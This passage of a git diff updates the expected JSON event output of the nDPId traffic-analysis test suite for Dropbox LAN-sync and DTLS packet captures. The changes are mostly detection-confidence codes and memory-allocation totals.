00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1535391651168,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391651168,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/jlBAAEAR6fXAqAFA\/\/\/\/\/0RcRFwAq9+deyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651168,"flow_last_seen":1535391651168,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651168,"flow_last_seen":1535391651168,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651170,"flow_last_seen":1535391651170,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651170,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1535391651170,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391651170,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/SNZAAEARbMjAqAFAwKgB\/0RcRFwAqxz2eyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651170,"flow_last_seen":1535391651170,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651170,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651170,"flow_last_seen":1535391651170,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651170,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1535391652506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391652506,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/jm9AAEAR6dbAqAFA\/\/\/\/\/0RcRFwAq9+deyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1535391652507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391652507,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/SaBAAEARa\/7AqAFAwKgB\/0RcRFwAqxz2eyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} -00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391652507,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391652507,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391652507,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391652507,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1535391682513,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391682513,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/nwpAAEAR2TvAqAFA\/\/\/\/\/0RcRFwAq9+deyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1535391682514,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1535391682514,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/ZDZAAEARUWjAqAFAwKgB\/0RcRFwAqxz2eyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651168,"flow_last_seen":1535391682513,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651170,"flow_last_seen":1535391682514,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651168,"flow_last_seen":1535391682513,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651170,"flow_last_seen":1535391682514,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","packets-captured":848,"packets-processed":848,"total-skipped-flows":0,"total-l4-payload-len":54916,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":6,"total-updates":2,"current-active-flows":0,"total-active-flows":15,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":103,"global_ts_msec":1535391682514} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 848/848 @@ -109,9 +109,9 @@ ~~ total active/idle flows...: 15/15 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5908707 bytes -~~ total memory freed........: 5908707 bytes -~~ total allocations/frees...: 119012/119012 +~~ total memory allocated....: 6042341 bytes +~~ total memory freed........: 6042341 bytes +~~ total allocations/frees...: 121774/121774 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 830 chars diff --git a/test/results/dtls.pcap.out b/test/results/dtls.pcap.out index ba46f0237..51704c9fb 100644 --- a/test/results/dtls.pcap.out +++ b/test/results/dtls.pcap.out 
@@ -2,7 +2,7 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1545143424891} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":200000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1545143424891,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1545143424891,"pkt":"WLEPD4fwhLVBbZhoCABFAAC3FtBAAEARhxHAqA3LwKgNOZ8j3MMAozuLFv7\/AAAAAAAAAAAAjgEAAIIAAAAAAAAAgv79zrBtKgTLKhUXwuJm7W22k25ueldyqs3Q4tvQaM4mc34AAAAYwCvAL8ypzKjACcATwArAFACcAC8ANQAKAQAAQP8BAAEAABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEADgAFAAIAAQAACwACAQAACgAIAAYAHQAXABg="} 
-01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":200000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"bd743610892cec1efed851b2b5efd4f5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":200000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": 
{"version":"DTLSv1.2","client_requested_server_name":"","ja3":"bd743610892cec1efed851b2b5efd4f5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1545143424891,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1545143424891,"pkt":"WLEPD4fwhLVBbZhoCABFAAC3FtBAAEARhxHAqA3LwKgNOZ8j3MMAozuLFv7\/AAAAAAAAAAAAjgEAAIIAAAAAAAAAgv79zrBtKgTLKhUXwuJm7W22k25ueldyqs3Q4tvQaM4mc34AAAAYwCvAL8ypzKjACcATwArAFACcAC8ANQAKAQAAQP8BAAEAABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEADgAFAAIAAQAACwACAQAACgAIAAYAHQAXABg="} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":200000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dtls.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":310,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1545143424891} 
@@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869509 bytes -~~ total memory freed........: 5869509 bytes -~~ total allocations/frees...: 118117/118117 +~~ total memory allocated....: 6003143 bytes +~~ total memory freed........: 6003143 bytes +~~ total allocations/frees...: 120879/120879 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 1053 chars diff --git a/test/results/dtls2.pcap.out b/test/results/dtls2.pcap.out index 91d1f9611..c0c734e28 100644 --- a/test/results/dtls2.pcap.out +++ b/test/results/dtls2.pcap.out 
@@ -2,12 +2,12 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1507911659748} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507911659748,"flow_last_seen":1507911659748,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1507911659748,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1507911659748,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":1507911659748,"pkt":"AAAAjZtQSEb7zh73CABFAABta10AAD8Ruf09RG6Z1CDWJ8818BEAWUhKFv7\/AAAAAAAAAAAARAEAADgAAAAAAAAAOP7\/xZOd2weR7n4d5xLXjiJT803Vm2GyIJyqcktro0p9KtUAAAAQADUALwAFAAQACgD7APwA\/QEA"} 
-01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507911659748,"flow_last_seen":1507911659748,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1507911659748,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 